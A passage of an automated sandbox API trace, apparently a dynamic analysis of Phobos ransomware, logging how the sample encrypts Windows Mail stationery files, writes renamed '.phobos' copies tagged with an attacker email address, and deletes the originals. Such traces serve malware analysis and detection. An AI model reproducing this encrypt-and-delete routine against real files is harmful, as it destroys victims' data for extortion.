lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0190.022] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0190.022] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0190.023] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0190.023] CryptDestroyKey (hKey=0xa32968) returned 1 [0190.023] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0190.023] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.023] CloseHandle (hObject=0x178) returned 1 [0190.023] CloseHandle (hObject=0x154) returned 1 [0190.023] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm")) returned 1 [0190.024] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0190.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0190.024] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=235) returned 1 [0190.024] CloseHandle (hObject=0x154) returned 1 [0190.025] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm")) returned 0x2020 [0190.025] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0190.025] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0190.025] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0190.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.025] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0190.026] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0190.026] ReadFile (in: hFile=0x154, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xeb, lpOverlapped=0x0) returned 1 [0190.026] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0190.026] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0190.027] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0190.027] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0190.027] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0190.027] CryptDestroyKey (hKey=0xa32968) returned 1 [0190.027] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0190.027] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.027] CloseHandle (hObject=0x154) returned 1 [0190.027] CloseHandle (hObject=0x178) returned 1 [0190.028] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm")) returned 1 [0190.029] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0190.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.030] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=4222) returned 1 [0190.030] CloseHandle (hObject=0x178) returned 1 [0190.030] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg")) returned 0x2020 [0190.030] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.030] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0190.030] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0190.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0190.031] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0190.031] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0190.031] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x107e, lpOverlapped=0x0) returned 1 [0190.229] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1080, dwBufLen=0x1080 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1080) returned 1 [0190.229] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1080, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1080, lpOverlapped=0x0) returned 1 [0190.232] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0190.232] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0190.232] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0190.232] CryptDestroyKey (hKey=0xa32de8) returned 1 [0190.232] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0190.232] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.232] CloseHandle (hObject=0x178) returned 1 [0190.233] CloseHandle (hObject=0x154) returned 1 [0190.233] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg")) returned 1 [0190.234] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0190.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0190.235] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=237) returned 1 [0190.235] CloseHandle (hObject=0x154) returned 1 [0190.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm")) returned 0x2020 [0190.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0190.235] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0190.235] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0190.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.367] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0190.367] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0190.367] ReadFile (in: hFile=0x154, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xed, lpOverlapped=0x0) returned 1 [0190.368] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0190.368] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0190.369] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0190.369] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0190.369] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0190.369] CryptDestroyKey (hKey=0xa32de8) returned 1 [0190.369] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0190.371] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.371] CloseHandle (hObject=0x154) returned 1 [0190.373] CloseHandle (hObject=0x178) returned 1 [0190.375] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm")) returned 1 [0190.376] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0190.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0190.397] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=6381) returned 1 [0190.397] CloseHandle (hObject=0xb8) returned 1 [0190.397] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg")) returned 0x2020 [0190.397] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0190.397] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0190.397] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0190.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0190.397] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0190.397] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0190.398] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x18ed, lpOverlapped=0x0) returned 1 [0190.439] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x18f0, dwBufLen=0x18f0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x18f0) returned 1 [0190.439] WriteFile (in: hFile=0x12c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x18f0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x18f0, lpOverlapped=0x0) returned 1 [0190.440] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0190.440] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0190.440] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0190.440] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.440] WriteFile (in: hFile=0x12c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0190.440] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0190.440] CloseHandle (hObject=0xb8) returned 1 [0190.440] CloseHandle (hObject=0x12c) returned 1 [0190.441] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg")) returned 1 [0190.441] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0190.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0190.442] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=237) returned 1 [0190.442] CloseHandle (hObject=0x12c) returned 1 [0190.442] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm")) returned 0x2020 [0190.442] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0190.442] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0190.442] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0190.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0190.497] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0190.497] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0190.497] ReadFile (in: hFile=0x12c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xed, lpOverlapped=0x0) returned 1 [0190.498] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0190.498] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0190.499] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, 